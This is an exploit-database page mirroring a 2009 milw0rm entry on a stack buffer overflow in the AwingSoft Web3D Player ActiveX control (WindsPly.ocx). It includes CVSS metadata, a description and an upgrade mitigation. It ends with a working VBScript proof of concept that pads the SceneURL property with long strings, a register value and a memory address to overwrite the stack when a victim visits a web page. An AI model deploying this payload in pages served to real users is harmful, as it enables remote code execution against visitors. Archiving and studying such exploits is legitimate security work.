header-logo
Suggest Exploit
vendor:
Web3D Player (WindsPly.ocx)
by:
shinnai
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Web3D Player (WindsPly.ocx)
Affected Version From: <= 3.5.0.0
Affected Version To: <= 3.5.0.0
Patch Exists: Yes
Related CWE: N/A
CPE: 17A54E7D-A9D4-11D8-9552-00E04CB09903
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional SP3
2009

AwingSoft Web3D Player (WindsPly.ocx) “SceneURL()” Remote Buffer Overflow

AwingSoft Web3D Player (WindsPly.ocx) is vulnerable to a remote buffer overflow vulnerability when the SceneURL() method is called with an overly long string. This can be exploited to execute arbitrary code by tricking a user into visiting a malicious web page. The vulnerability is caused due to a boundary error within the processing of the SceneURL() method. This can be exploited to cause a stack-based buffer overflow by passing an overly long string to the SceneURL() method.

Mitigation:

Upgrade to the latest version of AwingSoft Web3D Player (WindsPly.ocx)
Source

Exploit-DB raw data:

-----------------------------------------------------------------------------
 AwingSoft Web3D Player (WindsPly.ocx) "SceneURL()" Remote Buffer Overflow
 url: http://www.awingsoft.com/

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://www.shinnai.net/

 Dedicated to aaannamariaaa :D

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.

 File: WindsPly.ocx
 Ver.: <= 3.5.0.0
 GUID: {17A54E7D-A9D4-11D8-9552-00E04CB09903}
 ProgID: WindsPlayerIE.View.1

 Marked as:
 RegKey Safe for Script: Falso
 RegKey Safe for Init: Falso
 Implements IObjectSafety: Vero
 IDisp Safe: Safe for untrusted: caller,data
 IPersist Safe: Safe for untrusted: caller,data
 IPStorage Safe: Safe for untrusted: caller,data

 Tested on Windows XP Professional SP3 all patched, with Internet Explorer 8
-----------------------------------------------------------------------------
<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903' id='test'></object>

<script language='vbscript'>
  buff = String(8704, "A")
  mReg = unescape("bbbb")
  mExc = unescape("%00%00%01%00") 'Memory address: 00010000 Access: RW
  buf1 = String(88, "c")
  buf2 = String(47284, "D")

  test.SceneURL = buff + mReg + mExc + buf1 + buf2
</script>

# milw0rm.com [2009-07-10]

Navigation

Suggest Exploit

Services By CQR